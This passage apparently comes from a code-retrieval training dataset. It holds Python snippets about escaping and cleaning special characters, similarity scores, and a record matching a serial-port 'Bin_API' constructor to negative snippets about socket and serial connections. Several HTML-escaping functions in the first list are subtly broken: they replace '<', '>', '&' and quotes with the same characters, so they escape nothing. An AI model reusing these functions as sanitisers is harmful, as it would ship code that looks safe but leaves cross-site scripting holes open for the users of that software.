"def htmlquote(text):\r\n text = text.replace(\"&\", \"&\") # Must be done first!\r\n text = text.replace(\"<\", \"<\")\r\n text = text.replace(\">\", \">\")\r\n text = text.replace(\"'\", \"'\")\r\n text = text.replace('\"', \""\")\r\n return text",
"def insert_text(self, text):\n self.str += text",
"def remove_punctations_fun(self): \n self.doc = re.sub('[^a-zA-Z0-9]', ' ', self.doc)",
"def addpoemslashes(value):\n return value.replace(\"\\r\", \"\").replace(\"\\n\", ' / ')",
"def replaceNonAsciiFromText(self, text):\n\t\treturn ''.join([i if ord(i) < 128 else ' ' for i in text])",
"def escape(text):\n if (isinstance(text, basestring)):\n try: text = encode(text)\n except: text = copy(text)\n text = text.replace(\"&\", \"&\")\n text = text.replace(\"<\", \"<\")\n text = text.replace(\">\", \">\")\n return text",
"def forbidden_latex_chars():\n\n tex_char = ['\\\\', '{', '}', '&', '[', ']', '^', '~']\n chars = ', '.join(['\"{char}\"'.format(char=char) for char in tex_char])\n message = _(u\"Următoarele caractere sunt interzise și trebuie scoase : {chars}.\".format(chars=chars))\n return tex_char, message",
"def escape(t):\r\n return (t\r\n .replace(\"&\", \"&\").replace(\"<\", \"<\").replace(\">\", \">\")\r\n .replace(\"´\", \"'\").replace('\"', \""\").replace(\"'\",''')\r\n )",
"def pre_process(text: str) -> str:\n text = text.replace('--', '-')\n space_right = '!?:;,.-()*+-/<=>@^_'\n space_both = '-()*+-/<=>@^_'\n\n for punct in space_right:\n text = text.replace(punct, punct + ' ')\n for punct in space_both:\n text = text.replace(punct, ' ' + punct + ' ')\n\n # remove extra space\n text = re.sub(r' +', ' ', text)\n return text",
"def encode_tags(self, text):\n text = re.sub(self.patterns['html_open_tag'], r' __\\1_START ', text)\n text = re.sub(self.patterns['html_close_tag'], r' __\\1_END ', text)\n return text",
"def _preprocess(self, sent: str) -> str:\n sent = sent.replace(\" \", \"▁\")\n return \" \".join([c for c in sent])",
"def escape(t):\n return (t\n .replace(\"&\", \"&\").replace(\"<\", \"<\").replace(\">\", \">\")\n .replace(\"'\", \"'\").replace('\"', \""\")\n )",
"def escape(text):\n if isinstance(text, list):\n for i, t in enumerate(text):\n t = t.replace(r'\\&', r'&')\n t = t.replace(r'<', r'<')\n t = t.replace(r'>', r'>')\n text[i] = t\n else:\n text = text.replace(r'\\&', r'&')\n text = text.replace(r'<', r'<')\n text = text.replace(r'>', r'>')\n return text",
"def text_prep(text):\n text1 = text.lower()\n text2 = re.sub('[.,!?\"\\'-\\\\\\/:;1-9+]', ' ', text1)\n text3 = text2.replace('\\n', ' ')\n text4 = re.sub(' +', ' ', text3)\n text_obrab = text4.split()\n return text_obrab",
"def _apply_character_maskings(self):\n for permutation in self.permutations:\n for char_symbol in self.characters.keys():\n for i in permutation.find_all(\"character-link\", ref=char_symbol): \n i.string.replace_with(self.characters[char_symbol])\n\n self.plain_text = \" \".join([permuation.description.text for permuation in self.permutations])\n self.reapply_plain_text_editing()",
"def remove_special_chars(text):\n \n text = re.sub(' +', ' ', re.sub('[^A-Za-z ]+', ' ', text).strip())\n return text",
"def test_value_special_chars(self):\n raw = [\n 0x48,\n 0x65,\n 0x79,\n 0x21,\n 0x3F,\n 0x24,\n 0x20,\n 0xC4,\n 0xD6,\n 0xDC,\n 0xE4,\n 0xF6,\n 0xFC,\n 0xDF,\n ]\n string = \"Hey!?$ ÄÖÜäöüß\"\n self.assertEqual(DPTString.to_knx(string), raw)\n self.assertEqual(DPTString.from_knx(raw), string)",
"def insertChar(self, ch):\n word, cx = self.edCursor.getPos()\n string = word.string[:cx] + ch + word.string[cx:]\n word.setString(string)\n # Re-render from tline:\n self.rsubject.linify(word.tline)\n self.edCursor.setPos(word, cx+1)",
"def fix(text):\n\n text = text.replace(\"\\\\\", \"\\\\\\\\\")\n text = text.replace(\"{\", \"\\\\{\").replace(\"}\", \"\\\\}\")\n text = _nonAsciiPattern.sub(_replace, text)\n return text",
"def escape(s):\r\n return str(s).replace('<', '<').replace('>', '>')",
"def escape(text):\n if text is None:\n return\n else:\n return cgi.escape(text).encode('ascii', 'xmlcharrefreplace')",
"def escape_quote(text):\n return text_type(text).replace('&', '&').replace('<', '<').replace('>', '>').replace('\"', '"')",
"def remove_special(s):\n return ansi_escape_chars.sub('', s)",
"def escape(self) :\n #self.logdebug(\"ESCAPE\")\n self.handleTag(self.esctags)",
"def remove_special_characters(string_list):",
"def myescape(str):\n\tif str is not None:\n\t\treturn str.replace('&', '&').replace('<', '<')\n\telse:\n\t\treturn \"\"",
"def replace_characters(content_to_change):\n\tfor old_char, new_char in CHARS_TO_REPLACE.iteritems():\n\t\tcontent_to_change = content_to_change.replace(old_char, new_char)\n\n\treturn unicode(content_to_change, DESTINATION_ENCODING)",
"def secret_char(c):\n return \"\\\\raisebox{{0.07ex}}{{{}}}\".format(c)",
"def encode(user_word,shift):\n word = \"\" # creating a word variable\n for char in user_word: # iterating through every char in user_word\n if char in symbols:\n word += char\n continue\n elif char == \"'\":\n word += \"'\"\n continue\n \n\n elif char.isdigit(): # if a character is an integar number is found\n if user_word[user_word.index(char)-1] == \"-\":\n char = (int(char)*-1) + shift # converting character (number) from string to integar with incrementing it by a shift\n else: \n char = int(char) + shift # converting character (number) from string to integar with incrementing it by a shift\n \n char = str(char) # converting character from integar to string for displaying the word to user as string\n word += char # appending the char (string number) to word (string variable)\n continue # continue the loop, the get the next char for checking\n\n cipher_char = alphabet.index(char) # in this case, char is a letter, get its index in alphapet list saving it to cipher_char variable\n word += alphabet[cipher_char+shift] # appending shifted letter (got encoded by getting the letter that is after cipher_char by shift) to the word\n \n print(f\"\\nEncoded result> {word}\\n===========================================================\") # print the encoded word",
"def encode_parameters(self, text):\n return quote_plus(text, safe='=:&\"')",
"def urlencode(txt):\n return urllib.quote_plus(txt)",
"def _remove_special_chars(self, doc: str):\n processed_tweet = re.sub('[\\.,!#¡\\?¿%:;´\"@”“&()\\|]', '', doc)\n return processed_tweet",
"def defang_text(text):\n text = text.replace(\"'\", \"''\")\n text = text.replace('\"', '\"\"')\n return text",
"def process_text(text):\n text = re.sub(r'<@>\\s+|<s>\\s+|</s>\\s+|<p>\\s+|</p>\\s+|\\s+\\,|\\'s|\\'|\\;|\\(|\\)|\\-\\-\\s+|\\s+\\.', '', text)\n text = re.sub(r'\\.\\,', '. ,', text)\n text = re.sub(r'\\,', '', text)\n text = re.sub(r'\\$', '$ ', text)\n text = re.sub(r'\\%', ' %', text)\n text = re.sub(r'\\s\\\"\\s', ' ', text)\n text = re.sub(r'\\.\\s+', '. ', text)\n text = text.lower()\n return text",
"def _encode_html(data: str) -> str:\n return html.escape(data)",
"def _do_smart_punctuation(self, text):\r\n if \"'\" in text: # guard for perf\r\n text = self._do_smart_contractions(text)\r\n text = self._opening_single_quote_re.sub(\"‘\", text)\r\n text = self._closing_single_quote_re.sub(\"’\", text)\r\n\r\n if '\"' in text: # guard for perf\r\n text = self._opening_double_quote_re.sub(\"“\", text)\r\n text = self._closing_double_quote_re.sub(\"”\", text)\r\n\r\n text = text.replace(\"---\", \"—\")\r\n text = text.replace(\"--\", \"–\")\r\n text = text.replace(\"...\", \"…\")\r\n text = text.replace(\" . . . \", \"…\")\r\n text = text.replace(\". . .\", \"…\")\r\n return text",
"def _escape(html):\n return encoding.force_unicode(html).replace('&', '&').replace('<', '<').replace('>', '>').replace('\"', '"').replace(\"'\", ''')",
"def htmlspecialchars(val, flags = None):\n out = \"\"\n for i in range(0, len(val)):\n num = ord(unicode(val[i]))\n if htmlentitydefs.codepoint2name.has_key(num):\n out += \"&%s;\" % htmlentitydefs.codepoint2name[num]\n else:\n out += val[i]\n return out",
"def escape_shell_chars_tmsu(str):\n str = str.replace(\"/\", \"\\\\\")\n str = re.sub(\"(!|\\$|#|&|\\\"|\\'|\\(|\\)|\\||<|>|`|\\\\\\|;| )\", r\"\\\\\\1\", str)\n return str",
"def quote_bad_chars(s):\n bad_chars = [\"(\", \")\"]\n for char in bad_chars:\n s = s.replace(char, quotestring(char))\n return s",
"def escape(raw_string): \n return ''.join(\n [_caret_escapes_for_unprintables.get(c, c) for c in raw_string])",
"def escape_for_display(s) :\n if len(s) == 0 :\n return \"[EMPTY]\"\n return s.replace(\"\\n\",\"[NL]\").replace(\"\\t\",\"[TAB]\") #.replace(\" \",\"[SP]\") # Escape newlines so not to confuse debug output.",
"def escape(x):\n if '\\'' not in x:\n return '\\'' + x + '\\''\n s = '\"'\n for c in x:\n if c in '\\\\$\"`':\n s = s + '\\\\'\n s = s + c\n s = s + '\"'\n return s",
"def remove_special_chars(sentence):\r\n result = re.sub(r\"[^a-zA-Z0-9.]+\", ' ', re.sub('\\.\\.+', ' ', sentence))\r\n return result",
"def escape_single_quotes(custom_data):\n # https://stackoverflow.com/questions/10569438/how-to-print-unicode-character-in-python\n # https://regex101.com/r/nM4bXf/1\n if re.search(\"(?<!u)'(?!:|}|,)\", custom_data.get('title_name', '')):\n z = re.sub(r\"(?<!u)'(?!:|}|,)\", '\\\\\\'', custom_data.get('title_name', None))\n\n custom_data['title_name'] = z\n return custom_data\n return custom_data",
"def c_text(text):\n if text:\n if '_' in text:\n text = text.replace(\"_\", \" \")\n return 'C {}'.format(escape(text))",
"def _safe(text):\n return text.replace(\"'\", \"''\").replace(\"\\\\\", \"\\\\\\\\\")",
"def escape(cls, html):\n return (\"%s\" % (html)).replace('&', '&').replace('<', '<').replace('>', '>').replace('\"', '"').replace(\"'\", ''')"
] | [
"0.70876557",
"0.7074311",
"0.70390195",
"0.69395334",
"0.6510132",
"0.6444828",
"0.64407015",
"0.6432656",
"0.6415812",
"0.64102846",
"0.6397973",
"0.63384503",
"0.6326793",
"0.63186383",
"0.6290671",
"0.62346226",
"0.6180971",
"0.61617744",
"0.61617744",
"0.61369485",
"0.6117582",
"0.61156696",
"0.6109469",
"0.6107902",
"0.6100951",
"0.6053433",
"0.6046059",
"0.6042421",
"0.60301775",
"0.6022371",
"0.60173005",
"0.60118276",
"0.6007568",
"0.6005495",
"0.5981581",
"0.59803265",
"0.5967096",
"0.5963085",
"0.59616137",
"0.59594613",
"0.59405714",
"0.59380203",
"0.5903968",
"0.5902273",
"0.59005135",
"0.58933985",
"0.58927983",
"0.5888282",
"0.5857575",
"0.58506334",
"0.58491486",
"0.584501",
"0.5843568",
"0.5835549",
"0.58281374",
"0.58239496",
"0.58183825",
"0.5787254",
"0.5785572",
"0.57794255",
"0.57778704",
"0.57761055",
"0.5771807",
"0.5758023",
"0.57529694",
"0.5747586",
"0.57455903",
"0.57420325",
"0.5734525",
"0.57293165",
"0.5721921",
"0.5721399",
"0.57155603",
"0.57085836",
"0.57077897",
"0.5706246",
"0.5698083",
"0.56970745",
"0.5689006",
"0.5680908",
"0.5668837",
"0.56656224",
"0.5662608",
"0.56613123",
"0.56393814",
"0.5633934",
"0.56336886",
"0.56330085",
"0.56184995",
"0.56146693",
"0.5602431",
"0.560099",
"0.5593649",
"0.55931103",
"0.5585385",
"0.5584745",
"0.5582687",
"0.55825526",
"0.5581039",
"0.55804545",
"0.55803686"
] | 0.0 | -1 |
Init will connect to the com port of the shouter. | def __init__(self, comport, logging = False):
super(Bin_API, self).__init__(comport, logging) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def initialize(self):\n if self.real:\n self.agent.connect(self)\n else:\n self.connect() # Connect python client to VREP\n self.agent.connect(self)",
"def init_com(self):\r\n self.__ser = serial.Serial(\r\n self.__dev_no, self.__baudrate, timeout=self.__timeout)\r\n\r\n # Stop the Continious Stream, avoid error\r\n self.__ser.write(self.__api.esc_cmd())\r\n self.__ser.write(self.__api.devid_cmd())\r\n tmp = self.__ser.readline().decode()\r\n\r\n # Get Dev ID\r\n if \"ID= \" in tmp:\r\n self.__api.devid = tmp.split(\"ID= \")[1].replace(\"\\r\", \"\")\r\n rospy.loginfo(self.__api.devid)\r\n\r\n init_cmds = [self.__api.factory_settings_cmd, self.__api.format_cmd(self.__format),\r\n self.__api.sample_rate_cmd(100), self.__api.continuous_stream_cmd]\r\n\r\n for cmd in init_cmds:\r\n self.__ser.write(self.__api.write_enable_cmd)\r\n rospy.loginfo(self.__ser.readline().decode())\r\n time.sleep(self.init_sleep)\r\n rospy.loginfo(cmd)\r\n self.__ser.write(cmd)\r\n if cmd != self.__api.continuous_stream_cmd:\r\n rospy.loginfo(self.__ser.readline().decode())\r\n time.sleep(self.init_sleep)\r\n return True\r\n return False",
"def __init__(self):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.PORT = 2222\n # connect on construction,\n # use for duration of a game,\n # close connection on destruction later\n self.sock.connect((\"192.168.43.180\", self.PORT))",
"def __init__(self):\r\n\r\n self.port = 'COM3'\r\n self.baud = 9600\r\n\r\n try:\r\n self.ser = Serial(self.port, self.baud)\r\n except:\r\n exit(\"<ERROR: check serial connection>\")\r\n\r\n if not self.ser.is_open:\r\n exit(f\"<ERROR: can't open serial port: {self.port}>\")\r\n\r\n self.connect()",
"def connect(self):\n self.socket.connect((\"localhost\",self.PORT_NUM))",
"def __init__(self):\r\n try:\r\n print(f\"Connecting to Arduino on '{self._SERIAL_PORT}'...\", end='')\r\n self.ser = serial.Serial(self._SERIAL_PORT, self._BAUD, timeout=self._TIMEOUT)\r\n # Reset buffers to start with a clean slate\r\n self.ser.reset_input_buffer()\r\n self.ser.reset_output_buffer()\r\n print(\"Ok\")\r\n except serial.SerialException as e:\r\n print(\"Failed:\", e)",
"def __init__(self, host, server_port):\n # Set up the socket connection to the server\n self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.run(host, server_port)\n\n # TODO: Finish init process with necessary code\n #Vegard sier vi ikke skal skrive noe her",
"def connect(self) -> None:\n self.s.connect((self.ip, self.port))",
"async def init(self):\n logger.info(\"Init device: %s\", self._serial)\n self._callback(STATUS_INIT)\n\n self._init_binaries()\n self._init_apks()\n await self._init_forwards()\n\n await adb.shell(self._serial, \"/data/local/tmp/atx-agent server --stop\")\n await adb.shell(self._serial, \"/data/local/tmp/atx-agent server --nouia -d\")",
"def __init__(self):\n # Create a TCP/IP socket\n self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)",
"def connect(self):\n self.snmp_client = SNMPClient(host=self.host,\n read_community=self.read_community,\n write_community=self.write_community,\n port=self.port,\n version=self.version,\n log=self.log)",
"def _connect(self):\n\t\tself.log.info(\"Trying to connect to OBS Websockets...\")\n\n\t\ttry:\n\t\t\t\tself.client = obswebsocket.obsws(self.host, self.port, self.password)\n\t\t\t\tself.client.connect()\n\t\t\t\tself.log.info(\"...Connected to OBS Websockets at {}:{}\".format(self.host, self.port))\n\t\texcept Exception as e:\n\t\t\tself.log.error(\"Could not initialize connection at {}:{} to OBS Websockets! Exception: {}\".format(self.host, self.port, e))\n\t\t\traise",
"def init_connexion():\n connexion = socket(AF_INET, SOCK_STREAM)\n connexion.bind((hote, port))\n\n return connexion",
"def __init__(self, host=HOST, port=PORT):\r\n self._socket = None\r\n\r\n if host is not None:\r\n self.connect(host, port)",
"def __init__(self):\n self.try_to_connect()",
"def __init__(self, port):\n self.port = port\n self.connection = serial.Serial(timeout=1)\n self.connection.port = self.port",
"def _connect_to_hardware(self):\n if False: # !!!TEMP:need to validate config...\n if len(self.config['ports']) > 1:\n self.log.fatal(\"only one slave com port is supported\")\n if len(self.config['ports']) == 0:\n self.log.warning(\"no communication port setted!\")\n return\n port = self.config['ports'][0]\n self.communicator = RaspSerialCommunicator(\n platform=self, port=port,\n baud=self.config['baud'])\n self.communicator = RaspSerialCommunicator(\n platform=self, port='/dev/ttyAMA0',\n baud=115200)",
"def connect(self):\r\n try:\r\n self.host_win_ip = \"http://\" + self.host_ip + \":5985/wsman\"\r\n self.conn = Protocol(\r\n endpoint=self.host_win_ip,\r\n transport=\"ntlm\",\r\n username=self.usr,\r\n password=self.pwd,\r\n server_cert_validation=\"ignore\")\r\n logger.warn(\"Connecting Windows ...\")\r\n self.shell_id = self.conn.open_shell()\r\n logger.warn(self.shell_id)\r\n logger.warn('Connected to Windows.')\r\n except Exception as error:\r\n msg_exception_error = \"Exception raised: %s \" % error\r\n raise(msg_exception_error)",
"def __init__(self, com_str: str):\n self.com_str = com_str\n self.ser_arduino = Serial(self.com_str, 9600)\n logging.info(\"Arduino detected\")\n\n # Launch mediator\n self.arduino_mediator = ArduinoMediator(self.ser_arduino)\n self.arduino_mediator.start()\n logging.info(\"Arduino Mediator started\")\n\n handler = CsgoRequestHandler.create(\n self.arduino_mediator, self.data_store\n )\n self.server = HTTPServer((\"localhost\", 3000), handler)",
"def setUp(self):\n # Direct connection used to match the property values\n self.sockobj = socket(AF_INET, SOCK_STREAM)\n self.sockobj.settimeout(socket_timeout)\n # Connect to the selected server\n self.sockobj.connect(server) \n self.pyclient = PySimpleClient()\n self.cmd_num = 0\n for servo_type in app_nr.values():\n self.__dict__[servo_type] = self.pyclient.getComponent(\"MINORSERVO/\" + servo_type)",
"def init_relay(self, port):\n self.ser = SerialHelper()\n self.ser.port = port\n self.ser.start()",
"def __init__(self, host=\"127.0.0.1\", port=8888, ae_title=\"PYMEDPHYSCONNECT\"):\n\n self.host = host\n self.port = port\n self.ae_title = ae_title\n\n logging.debug(\n \"DicomConnect host: %s, port: %d, AE Title: %s\",\n self.host,\n self.port,\n self.ae_title,\n )",
"def init_serial():\n ser = serial.Serial()\n #ser.port = \"\\\\.\\COM4\" # Windows\n ser.port = \"/dev/ttyUSB0\" # Linux\n ser.baudrate = 57600\n try:\n ser.open()\n except Exception, e:\n logger.info(\"Possible open serial port: \" + str(e))\n print 'Check the serial USB port.'\n exit()\n return ser",
"def init_client():\n init_config()\n begin_sending_packets()",
"def connect(self):\n\n import serial\n\n if self.addr == None:\n self.addr = self.get_EFu_addr()\n\n self.ser = serial.Serial(self.addr, 115200, timeout=1)\n if self.ser.isOpen():\n print('Opened port: {}'.format(self.addr))\n else:\n raise RuntimeError('Failed to open the serial port: {}'.format(self.addr))",
"def __init__(self, connection_type='bluetooth'):\n if connection_type not in ['bluetooth', 'usb']:\n raise Exception('Connection type \\'' + connection_type + '\\' is not supported')\n\n self.buffer = \"\";\n\n self.serial_settings = module_config['computers'][host_pc]\n self.Serial = Serial(self.serial_settings[connection_type])\n self.Serial.reset_input_buffer() # disregard everything sent before the connection has benn established\n print(\"SerialConnection initialised using\", connection_type)",
"def _initialize(self):\n self.send_init_command()",
"def initServer( self ):\n self.createDict()\n self.queue = []\n if not self.regKey or not self.serNode: raise SerialDeviceError( 'Must define regKey and serNode attributes' )\n port = yield self.getPortFromReg( self.regKey )\n self.port = port\n try:\n serStr = yield self.findSerial( self.serNode )\n self.initSerial( serStr, port )\n except SerialConnectionError, e:\n self.ser = None\n if e.code == 0:\n print 'Could not find serial server for node: %s' % self.serNode\n print 'Please start correct serial server'\n elif e.code == 1:\n print 'Error opening serial connection'\n print 'Check set up and restart serial server'\n else: raise\n yield self.populateDict()\n self.free = True\n self.setComp( None, 'common', 0.0 )",
"def initSocket(self):\n \n # Check WebSocket support\n if self.nodejs:\n try:\n WebSocket = require('ws') # does not work on Windows?\n #WebSocket = require('websocket').client\n except Exception:\n # Better error message\n raise \"FAIL: you need to 'npm install -g ws'.\"\n else:\n WebSocket = window.WebSocket\n if (window.WebSocket is undefined):\n document.body.innerHTML = 'This browser does not support WebSockets'\n raise \"FAIL: need websocket\"\n # Open web socket in binary mode\n self.ws = ws = WebSocket(flexx.ws_url)\n ws.binaryType = \"arraybuffer\"\n \n def on_ws_open(evt):\n console.info('Socket connected')\n def on_ws_message(evt):\n flexx.last_msg = evt.data or evt\n msg = flexx.decodeUtf8(flexx.last_msg)\n flexx.command(msg)\n def on_ws_close(evt):\n self.ws = None\n msg = 'Lost connection with server'\n if evt and evt.reason: # nodejs-ws does not have it?\n msg += ': %s (%i)' % (evt.reason, evt.code)\n if (not flexx.is_notebook) and (not self.nodejs):\n document.body.innerHTML = msg\n else:\n console.info(msg)\n def on_ws_error(self, evt):\n self.ws = None\n if flexx.is_notebook:\n console.error('Socket error: re-run flexx.app.init_socket() to connect.')\n else:\n console.error('Socket error')\n \n # Connect\n if self.nodejs:\n ws.on('open', on_ws_open)\n ws.on('message', on_ws_message)\n ws.on('close', on_ws_close)\n ws.on('error', on_ws_error)\n else:\n ws.onopen = on_ws_open\n ws.onmessage = on_ws_message\n ws.onclose = on_ws_close\n ws.onerror = on_ws_error",
"def __init__(self, host, server_port):\n\n # Set up the socket connection to the server\n self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n \n # TODO: Finish init process with necessary code\n self.host = host\n self.server_port = server_port\n self.run()",
"def __init__(self):\r\n self.client_socket = socket.socket() # the socket of the client.\r\n self.communicator = Communicator()\r\n self.events_handler = EventsHandler(self.client_socket)\r\n self.running = True\r\n self.display_resolution = DEFAULT_DISPLAY_RESOLUTION\r\n self.screen = self.get_display()",
"def __init__(self):\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.s.bind((socket.gethostname(), self.__SERVER_PORT))\n self.s.listen(5)\n print(\"<Server> Listening on {}:{}...\".format(socket.gethostname(), self.__SERVER_PORT))",
"def init_host(self):\n\n LOG.debug(_('XManager init_host...'))\n\n pass",
"def __init__(self, host=\"localhost\", port=60151, verbose=False):\n super(IGVSocketRobot, self).__init__(verbose=verbose)\n\n self.host = host\n self.port = port",
"def __init__(self, host, port=2345):\n self.host = host\n self.port = port\n self.set_command_list()",
"def init(config):\n ser_if = serial.Serial(config.serial_if, config.baud, timeout=config.timeout)\n sleep(1.6) # wait for serial port to be ready TODO: find a way to check\n return ser_if",
"def connect(self):\n try:\n # Port and packet handler set up\n self.port_handler = port_h.PortHandler(self.port_name)\n self.packet_handler = packet_h.PacketHandler(self.protocol_version)\n\n # Set up port and baud rate\n self.port_handler.openPort()\n self.port_handler.setBaudRate(self.baud_rate)\n self.__find_motors()\n except rospy.ROSInterruptException: pass\n\n self.running = True",
"def initSocket(self):\n \n # Check WebSocket support\n if self.nodejs:\n try:\n WebSocket = require('ws')\n except Exception:\n # Better error message\n raise \"FAIL: you need to 'npm install -g ws' (or 'websocket').\"\n else:\n WebSocket = window.WebSocket\n if (WebSocket is undefined):\n window.document.body.innerHTML = 'Browser does not support WebSockets'\n raise \"FAIL: need websocket\"\n # Open web socket in binary mode\n self.ws = ws = WebSocket(window.flexx.ws_url)\n #ws.binaryType = \"arraybuffer\" # would need utf-decoding -> slow\n \n def on_ws_open(evt):\n window.console.info('Socket connected')\n ws.send('hiflexx ' + flexx_session_id)\n def on_ws_message(evt):\n window.flexx.last_msg = msg = evt.data or evt\n #msg = window.flexx.decodeUtf8(msg)\n window.flexx.command(msg)\n def on_ws_close(evt):\n self.ws = None\n msg = 'Lost connection with server'\n if evt and evt.reason: # nodejs-ws does not have it?\n msg += ': %s (%i)' % (evt.reason, evt.code)\n if (not window.flexx.is_notebook) and (not self.nodejs):\n window.document.body.innerHTML = msg\n else:\n window.console.info(msg)\n def on_ws_error(self, evt):\n self.ws = None\n window.console.error('Socket error')\n \n # Connect\n if self.nodejs:\n ws.on('open', on_ws_open)\n ws.on('message', on_ws_message)\n ws.on('close', on_ws_close)\n ws.on('error', on_ws_error)\n else:\n ws.onopen = on_ws_open\n ws.onmessage = on_ws_message\n ws.onclose = on_ws_close\n ws.onerror = on_ws_error",
"def __init__(self, hostname, port, username, password, tenant_id, connect=True):\n self.cmd_gw_ws_api = HawkularWebsocketClient(\n url=\"ws://{}:{}/hawkular/command-gateway/ui/ws\".format(hostname, port),\n headers={\"Hawkular-Tenant\": tenant_id, \"Accept\": \"application/json\"},\n username=username, password=password)\n self.tenant_id = tenant_id\n if connect:\n self.cmd_gw_ws_api.connect()",
"def init(self):\n self.IP_ADDRESS = \"192.168.16.55\"\n self.PORT = 8888\n self.windFreakConnection = windFreakClient.ConnectionConstantFrequency(IP_ADDRESS=self.IP_ADDRESS, port=self.PORT) \n self.initialised=True\n return \"%s init successful\" % self.hardwareActionName",
"def __init__(self):\n self.host = socket.gethostname() # 192.168.56.1\n self.port = 33000\n self.buffer_size = 1024\n self.address = (self.host, self.port)",
"def __init__(self):\n super(TCPReader, self).__init__()\n\n self.host = config.get(\"HOST\")\n self.port = config.get(\"PORT\")\n self.listener = None\n\n # Thread Loop\n self.running = True\n\n # Report back to the main thread if we could bind to the port or not. Main thread will not continue\n # if port was not bound to.\n self.startup = threading.Event()\n self.startup_success = False",
"def init_conn(self):\n \n SERVER_ADDRESS = '192.168.0.21'\n PORT = 8018\n SERVER_PASSWORD = \"biratkingofcomedy\" \n connected = False\n \n # check if test module is being run\n if self.testing == 'n': \n while not connected:\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n \n try:\n self.socket.connect((SERVER_ADDRESS, PORT))\n \n # server verification\n self.socket.sendall(self.make_packet(\"DATA\", SERVER_PASSWORD))\n \n response = self.socket.recv(4096)\n \n if response:\n response_hdr, response_msg, response_sdr = self.parse_packet(response)\n \n if response_hdr == \"ERROR\" and response_msg == \"IDENTIFY FAILED\":\n raise Exception(\"PASSWORD FAIL\")\n \n elif response_hdr == \"DATA\" and response_msg == \"CONNECTED\":\n connected = True\n \n else:\n raise Exception(\"CONNECTION FAIL\") \n \n except Exception as e:\n if e == \"PASSWORD FAIL\":\n print(\"DEBUG: server connection failed (invalid credentials)\")\n print(\"DEBUG: quitting\")\n break\n \n else:\n print(e)\n print(\"DEBUG: server connection failed (could not connect), trying again in 10s\")\n time.sleep(10)\n \n else:\n print(\"DEBUG: socket setup skipped\")",
"def start(self):\n self.protocol.makeConnection(self.transport)",
"def start(self):\n self.protocol.makeConnection(self.transport)",
"def comInit(self, port):\n if DEBUG > 1: sys.stderr.write(\"* comInit()\\n\")\n self.seqNo = 0\n self.reqNo = 0\n self.rxPtr = 0\n self.txPtr = 0\n # Startup-Baudrate: 9600,8,E,1, 1s timeout\n self.serialport = serial.Serial(\n port,\n 9600,\n parity = serial.PARITY_EVEN,\n timeout = self.timeout\n )\n if DEBUG: sys.stderr.write(\"using serial port %r\\n\" % self.serialport.portstr)\n #self.SetRSTpin() #enable power\n #self.SetTESTpin() #enable power\n self.serialport.flushInput()\n self.serialport.flushOutput()",
"def connect():",
"def __init__(self):\n self._server = None\n self._address = \"\"\n self._port = 0",
"def connect(self):\n self.ws.connect()",
"def __init__(self):\n self.host = CONF.zvm.zvm_xcat_server\n self.port = 443\n self.conn = HTTPSClientAuthConnection(self.host, self.port,\n CONF.zvm.zvm_xcat_ca_file,\n timeout=CONF.zvm.zvm_xcat_connection_timeout)",
"def connect(self):\n if (self.Type == \"SERIAL\"):\n if (self.Port== None):\n raise self.ErrorNoPortDefined(\"Can't connect, no serial port defined.\")\n elif self.State!=0:\n raise self.ErrorAlreadyConnected(\"Can't connect, already connected.\")\n else:\n #try:\n self.Port.open()\n self.State = 1\n time.sleep(0.5)\n #self.SERIAL_SEND_cmd( ' ' )\n #self.flush_recv_buf()\n self.SERIAL_FLUSH_buffers()\n time.sleep(0.5)\n self.SERIAL_SEND_cmd( ' ' )\n time.sleep(0.5)\n self.SERIAL_FLUSH_buffers()\n if self.debug > 1:\n print \"Trying to send reset command...\"\n self.reset()\n time.sleep(0.5)\n # reset protocol to auto\n self.reset_protocol()\n time.sleep(0.5)\n # report what protocol was discovered\n self.rtrv_attr()\n #except serial.SerialException as inst:\n # self.State = 0\n # raise inst\n elif (self.Type == \"FILE\"):\n print \"Nothing to do.. not a serial port...\"\n pass",
"def __init__(self, host, port):\n self.host = host\n self.port = port",
"def __init__(self, host, port):\n self.host = host\n self.port = port",
"def start(self):\n\n address = (socket.gethostbyname(self.hostname), self.port)\n logger.info(\"Connecting to %r\" % (address,))\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._socket.connect(address)\n self._start_processors()\n return self",
"def __init__(self):\n\n # For now, we'll connect to the target via the Apollo debug controller.\n # This should be replaced by a high-speed USB link soon; but for now\n # we'll use the slow debug connection.\n self._debugger = ApolloDebugger()\n self._serial = self._find_serial_connection()",
"def __init__(self):\n self.host = None\n self.port = None\n self.topic = None\n self._is_opened = False\n self.debug = 0\n self.qos = 0\n self.mqttc = mqtt.Client(\"sng_mqtt\")",
"def open(self):\n self.device = ConnectHandler(\n device_type='vyos',\n host=self.hostname,\n username=self.username,\n password=self.password,\n timeout=self.timeout,\n port=self.port\n )",
"def __init__(self, *args, **kwargs):\n self.args = args\n self.kwargs = kwargs\n\n config = kwargs.get(\"config\", kwargs)\n self.connection_type = config.get(\"connection_type\", None)\n self.connection = connection_decider.connection(device=self,\n conn_type=self.connection_type,\n **kwargs)\n self.connection.connect()\n self.consoles = [self]\n super(PrplMeshStation, self).__init__(*args, **kwargs)\n self.iface_dut = self.iface_wifi = self.kwargs.get(\n 'iface', 'wlan0')\n self.driver_name = config.get(\"driver\", \"nl80211,wext\")\n self.mac = self.get_mac()\n\n # kill all wpa_supplicant relevant to active interface\n self.wifi_disconnect()\n # Turn on and off wlan iface just in case\n self.disable_and_enable_wifi()",
